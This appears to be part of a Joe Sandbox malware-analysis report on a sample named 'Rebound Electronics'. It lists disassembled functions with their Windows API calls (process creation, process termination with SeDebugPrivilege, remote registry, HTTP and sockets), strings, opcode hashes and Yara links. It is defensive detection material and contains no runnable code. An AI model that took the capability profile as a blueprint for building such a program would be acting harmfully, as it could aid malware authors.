HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00C746BF
InternetCloseHandle.WININET(00000000), ref: 00C74706

Part of subcall function 00C75052: GetLastError.KERNEL32(?,?,00C743CC,00000000,00000000,00000001), ref: 00C75067

Strings

, xrefs: 00C746B8

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: d855969f362d0cd4528a5318f1a2a9ef9bc2bced446152ba714ec526295d4c03
Instruction ID: 307901566c6c42ee45b0ac5a8d56bba1db97e3ed7971a1dd110a296d5e8ebcc1
Opcode Fuzzy Hash: d855969f362d0cd4528a5318f1a2a9ef9bc2bced446152ba714ec526295d4c03
Instruction Fuzzy Hash: 46417CB1501219BFEB099F60CC89FFE77ACFF09354F008016FA1ADA195D7B09A449BA4

Function 00C7B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00CBDC00), ref: 00C7B715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00CBDC00), ref: 00C7B749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C7B8C1
SysFreeString.OLEAUT32(?), ref: 00C7B8EB

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 790000e07297c22efe0e192d8214f89a97bb1d8b8405b227499a470395800086
Instruction ID: 947a68b54d2bd3f291046bccdf3303838803b7c2ba27669db0735ca2febb3275
Opcode Fuzzy Hash: 790000e07297c22efe0e192d8214f89a97bb1d8b8405b227499a470395800086
Instruction Fuzzy Hash: BFF12A75A00209EFCF04DF94C888EAEB7B9FF49315F108459F91AAB250DB31AE45DB90

Function 00C824D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C824F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C82688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C826AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C826EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C8270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C8286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00C828A1
CloseHandle.KERNEL32(?), ref: 00C828D0
CloseHandle.KERNEL32(?), ref: 00C82947

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 1099ce95aa695e67da5dcd6946615d689870a6bc3e46b8ad35245376441b9211
Instruction ID: 84e8a3ec7cef26c1e9346bd243e11e68aaa80789215b6dd79e07740d0a6eca3c
Opcode Fuzzy Hash: 1099ce95aa695e67da5dcd6946615d689870a6bc3e46b8ad35245376441b9211
Instruction Fuzzy Hash: B2D1BD31604200DFCB14EF24C895B6EBBE4BF85314F14896DF89A9B2A2DB30ED41DB56

Function 00C8B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C8B3F4

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 826efa410d6fb02a3e70f1008646a5e0029e1c12151a5432964ad7fbb6612ac6
Instruction ID: 6716ae816ace3e72c2f7047d231d1589a775a9b4c2ab6dc426d666d788e2f30e
Opcode Fuzzy Hash: 826efa410d6fb02a3e70f1008646a5e0029e1c12151a5432964ad7fbb6612ac6
Instruction Fuzzy Hash: 8951A270500204BBEF24BF29CD86BAD3B64AF0531CF644015FA25D76E2CB71EE949B59

Function 00C3A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00C9DB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C9DB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C9DB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00C9DB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C9DB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,00C3A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00C9DBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C9DBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,00C3A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00C9DBC8

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 4d356bfc1dc7f3e892fe9daa8a9b8abc3998c1cc5363860dd5c8ee966fead9ae
Instruction ID: 1957314702514484a1d37a054ab672739ee255863e988c4116eada86fdc82d74
Opcode Fuzzy Hash: 4d356bfc1dc7f3e892fe9daa8a9b8abc3998c1cc5363860dd5c8ee966fead9ae
Instruction Fuzzy Hash: 05517970610208EFDF24DF69CC85FAA77B8EB09754F100518F957A7690DBB0ADA0DB50

Function 00C67555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C66EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C65FA6,?), ref: 00C66ED8

Part of subcall function 00C66EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C65FA6,?), ref: 00C66EF1

Part of subcall function 00C672CB: GetFileAttributesW.KERNEL32(?,00C66019), ref: 00C672CC

lstrcmpiW.KERNEL32(?,?), ref: 00C675CA
_wcscmp.LIBCMT ref: 00C675E2
MoveFileW.KERNEL32(?,?), ref: 00C675FB

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: c9d610c6dba4b0bdedd963ea98d4c77703f5e7ad1827548a88ccd1efb81039bc
Instruction ID: 978264ef0291840aba8ce0328a082581436f435972de5233699171f1931d618e
Opcode Fuzzy Hash: c9d610c6dba4b0bdedd963ea98d4c77703f5e7ad1827548a88ccd1efb81039bc
Instruction Fuzzy Hash: 945131B2A092199ADF61EBA4D881DDE73BCAF08314F1045AAFA05E3541EA74D7C5CB60

Function 00C3EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00C9DAD1,00000004,00000000,00000000), ref: 00C3EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00C9DAD1,00000004,00000000,00000000), ref: 00C3EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00C9DAD1,00000004,00000000,00000000), ref: 00C9DC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00C9DAD1,00000004,00000000,00000000), ref: 00C9DCF2

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 6dea460d694e683337752138d7862602e6c08d2df3b1d859e462744ea132dd8a
Instruction ID: a5de2f40501501726b1d2630bf1450ac01a0b6ea94da57289ccba78762929e8c
Opcode Fuzzy Hash: 6dea460d694e683337752138d7862602e6c08d2df3b1d859e462744ea132dd8a
Instruction Fuzzy Hash: AC41E970225280DBDF3A5B298D8DB6ABB95EB4230CF19080DF097979E1C770BD40D719

Function 00C5B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C5AEF1,00000B00,?,?), ref: 00C5B26C
HeapAlloc.KERNEL32(00000000,?,00C5AEF1,00000B00,?,?), ref: 00C5B273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C5AEF1,00000B00,?,?), ref: 00C5B288
GetCurrentProcess.KERNEL32(?,00000000,?,00C5AEF1,00000B00,?,?), ref: 00C5B290
DuplicateHandle.KERNEL32(00000000,?,00C5AEF1,00000B00,?,?), ref: 00C5B293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C5AEF1,00000B00,?,?), ref: 00C5B2A3
GetCurrentProcess.KERNEL32(00C5AEF1,00000000,?,00C5AEF1,00000B00,?,?), ref: 00C5B2AB
DuplicateHandle.KERNEL32(00000000,?,00C5AEF1,00000B00,?,?), ref: 00C5B2AE
CreateThread.KERNEL32(00000000,00000000,00C5B2D4,00000000,00000000,00000000), ref: 00C5B2C8

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 20730ea4197285704b5e84bf9be86031ae08d18befa0d92dafbcac2ac3399f96
Instruction ID: 7822b9fdaaddda7245e3fc4ebc8f10ca9e2c29ec9c496a70b228c600caa8122d
Opcode Fuzzy Hash: 20730ea4197285704b5e84bf9be86031ae08d18befa0d92dafbcac2ac3399f96
Instruction Fuzzy Hash: C901BBB5241304BFEB10ABA5DC49FAF7BACEB89715F018411FA06DB5A1CA749800CB61

Function 00C7C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00C7C49E
NULL Pointer assignment, xrefs: 00C7C876, 00C7C887

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 889bbfb7168959b3ce9ed024f18ddca66c6603e96000fe6b9383f1b4272d26bb
Instruction ID: ddb6c2807e30ba3a2e26843644329e9eb6d47ec88840df384fd6b50e02840ff9
Opcode Fuzzy Hash: 889bbfb7168959b3ce9ed024f18ddca66c6603e96000fe6b9383f1b4272d26bb
Instruction Fuzzy Hash: A8E1B371A0021AABDF14DFA4D8C5BAE77B9EF48314F14802DF919AB281D770AE41DB90

Function 00C7BB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C7BB5C
VariantInit.OLEAUT32(?), ref: 00C7BC2D
VariantInit.OLEAUT32(?), ref: 00C7BD2E
VariantClear.OLEAUT32(?), ref: 00C7BD38
VariantClear.OLEAUT32(?), ref: 00C7BD99

Strings

Null Object assignment in FOR..IN loop, xrefs: 00C7BBBD, 00C7BCEB, 00C7BDA7
Incorrect Object type in FOR..IN loop, xrefs: 00C7BD11

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: cbd7b3b3623349587f643719e3d44fa9b166bfe9f93113f6a2593963d30acb26
Instruction ID: af84190a164dc5bcd43f0ecea062e68fd0d2c32efb90a90cd405c026057b670a
Opcode Fuzzy Hash: cbd7b3b3623349587f643719e3d44fa9b166bfe9f93113f6a2593963d30acb26
Instruction Fuzzy Hash: D9918171A00219ABDF25CFA5C848FAEB7B8EF55710F10C55AF519AB284DB709E44CFA0

Function 00C89A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C89B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 00C89B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C89B47
_wcscat.LIBCMT ref: 00C89BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00C89BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C89BE7

Strings

SysListView32, xrefs: 00C89AEB

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 920e4b812561c775a392ddc7620b0c5dc67fedb6546c41fe83386a5ac1a8a0af
Instruction ID: dd71c14e5a2e508bbf0c32aff36f5c7fb71ddbd38f152e475e630c23084fccf1
Opcode Fuzzy Hash: 920e4b812561c775a392ddc7620b0c5dc67fedb6546c41fe83386a5ac1a8a0af
Instruction Fuzzy Hash: 2741C370940308ABDB21AFA4CC85BFE77A8EF08358F14042AF555A7291D7719D84DB64

Function 00C8172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00C66532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00C66554
Part of subcall function 00C66532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00C66564
Part of subcall function 00C66532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00C665F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C8179A
GetLastError.KERNEL32 ref: 00C817AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C817D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 00C81855
GetLastError.KERNEL32(00000000), ref: 00C81860
CloseHandle.KERNEL32(00000000), ref: 00C81895

Strings

SeDebugPrivilege, xrefs: 00C817B8

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 9b77315a483995e7f4d207260e7d237509ddbe79a43a1dbb4dacd53689f79616
Instruction ID: 18a1289b981c1c95746b3a6c47957b8fdcff178b6b95693c25161aa971bc6bfd
Opcode Fuzzy Hash: 9b77315a483995e7f4d207260e7d237509ddbe79a43a1dbb4dacd53689f79616
Instruction Fuzzy Hash: 6741EF71600200AFDF15EF94C8D6F6DB7E5AF04314F098058FA069F2D2DB78AA05DB99

Function 00C65819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00C658B8

Strings

question, xrefs: 00C65871
warning, xrefs: 00C658A1
stop, xrefs: 00C65889
blank, xrefs: 00C6583A
info, xrefs: 00C65859

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 83ec4c10adf28572be2c815dbcc2a998e37b8929a700d43059b256e878f05c6b
Instruction ID: bc9fa75671807e329d0fb4c7aed9f8eb1bc7adda82d1b9810bd4982c265efab9
Opcode Fuzzy Hash: 83ec4c10adf28572be2c815dbcc2a998e37b8929a700d43059b256e878f05c6b
Instruction Fuzzy Hash: 1E11E735689B46BEE7255B959CC2DAE37DCAF19324F30003AFA11E76C1E7B0AA004665

Function 00C6A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00C6A806

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: e4ecce57b7f0f9ca6d9d01422191394552029bdb30329d9699fa869a2b1dfe7f
Instruction ID: f263d58e2868fe7486f56fe1ae628d606bc44a748adae1bffd6bdda87a9d4ac4
Opcode Fuzzy Hash: e4ecce57b7f0f9ca6d9d01422191394552029bdb30329d9699fa869a2b1dfe7f
Instruction Fuzzy Hash: A0C17B75A0421ADFDB20CF98C4C5BAEB7F4EF09315F20406AE616E7281D734AA81DF91

Function 00C66B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C66B63
LoadStringW.USER32(00000000), ref: 00C66B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C66B80
LoadStringW.USER32(00000000), ref: 00C66B87
_wprintf.LIBCMT ref: 00C66BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C66BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00C66BA8

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 948c58515d6c033e7491751d0a4dcc4d625dd8e5ddccb0679d4adbca58019f05
Instruction ID: 511354e4d70308d7f5206a165261cf3eaee2129884e7e8abc6fe8e9abdc15d08
Opcode Fuzzy Hash: 948c58515d6c033e7491751d0a4dcc4d625dd8e5ddccb0679d4adbca58019f05
Instruction Fuzzy Hash: 45011DF6900208BFEB11ABA49D89FEA776CE709308F0044A1B747E6451EA749E848B71

Function 00C82B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C83C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C82BB5,?,?), ref: 00C83C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C82BF6

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: 3536b8374389586afddf1137ad7bb7ee418b48cd6341ab27d61b066c76c40189
Instruction ID: a0dac888d89a069ed05e9966bf2c733d6986a221ff4dc01ccf93b19692a007dc
Opcode Fuzzy Hash: 3536b8374389586afddf1137ad7bb7ee418b48cd6341ab27d61b066c76c40189
Instruction Fuzzy Hash: 93918A712042019FCB10EF54D895B6EBBE5FF88318F04881DF996972A2DB34EE05EB46

Function 00C7961C Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 00C79691
WSAGetLastError.WSOCK32(00000000), ref: 00C7969E
__WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00C796C8
